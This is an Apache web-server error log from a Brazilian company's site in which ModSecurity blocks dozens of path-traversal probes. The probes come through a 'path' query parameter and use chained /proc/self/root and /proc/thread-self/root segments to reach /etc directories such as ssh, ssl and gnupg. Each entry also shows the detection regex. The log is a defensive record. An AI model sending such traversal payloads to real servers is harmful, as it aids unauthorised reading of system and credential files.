[Mon Mar 16 22:24:00.219349 2026] [:error] [pid 2304:tid 140411683178240] [client 74.7.241.46:45484] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitMMh3JZxwdBQwPYGzeQAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:01.618658 2026] [:error] [pid 2305:tid 140411540502272] [client 74.7.241.46:45500] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitMQQohV2v-7oj5HG9yQAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:01.898334 2026] [:error] [pid 2305:tid 140411565680384] [client 74.7.241.46:45500] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitMQQohV2v-7oj5HG9ygAAAZU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:03.432438 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.241.46:45506] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitM6BJNF7axNlVR0W77QAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:04.806155 2026] [:error] [pid 2304:tid 140411565680384] [client 74.7.241.46:45510] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitNMh3JZxwdBQwPYGzfQAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:06.228756 2026] [:error] [pid 2325:tid 140411658000128] [client 74.7.241.46:45520] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitNu82sZHvlq4xgHqCqgAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:07.681201 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.241.46:45534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitN6BJNF7axNlVR0W78QAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:18.855153 2026] [:error] [pid 2305:tid 140411548894976] [client 74.7.241.46:48276] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitQgQohV2v-7oj5HG91wAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:20.057869 2026] [proxy_fcgi:error] [pid 2473:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:58384] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:24:21.371035 2026] [:error] [pid 2305:tid 140411683178240] [client 74.7.241.46:48282] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitRQQohV2v-7oj5HG93QAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:24.773624 2026] [:error] [pid 2305:tid 140411658000128] [client 74.7.241.46:48292] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitRwQohV2v-7oj5HG93wAAAYo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:26.793641 2026] [:error] [pid 2473:tid 140411548894976] [client 74.7.241.46:48306] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitSqBJNF7axNlVR0W7-gAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:29.445786 2026] [:error] [pid 2325:tid 140411557287680] [client 74.7.241.46:49444] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitTe82sZHvlq4xgHqCwAAAApY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:29.913494 2026] [:error] [pid 2304:tid 140411540502272] [client 74.7.243.203:55692] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitTch3JZxwdBQwPYGzkwAAAJg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:24:31.573437 2026] [:error] [pid 2473:tid 140411632822016] [client 74.7.243.203:51770] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitT6BJNF7axNlVR0W8AQAAAA0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:24:42.129787 2026] [proxy_fcgi:error] [pid 2304:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58618] AH01075: Error dispatching request to : (polling)
[Mon Mar 16 22:24:43.253356 2026] [:error] [pid 2304:tid 140411582465792] [client 74.7.241.46:49456] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitW8h3JZxwdBQwPYGzmQAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:46.264535 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.241.46:46350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitXqBJNF7axNlVR0W8CwAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:46.769232 2026] [:error] [pid 2304:tid 140411649607424] [client 74.7.243.203:44870] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitXsh3JZxwdBQwPYGzmwAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:24:48.745099 2026] [:error] [pid 2473:tid 140411674785536] [client 74.7.241.46:55970] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitYKBJNF7axNlVR0W8DwAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:50.028164 2026] [:error] [pid 2305:tid 140411582465792] [client 74.7.241.46:55976] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitYgQohV2v-7oj5HG97wAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 22:24:50.099443 2026] [:error] [pid 2304:tid 140411548894976] [client 74.7.243.203:50982] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitYsh3JZxwdBQwPYGzngAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:24:53.211474 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.243.203:50998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abitZaBJNF7axNlVR0W8EgAAAAc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 22:25:04.137830 2026] [proxy_fcgi:error] [pid 2305:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:58848] AH01075: Error dispatching request to : (polling)
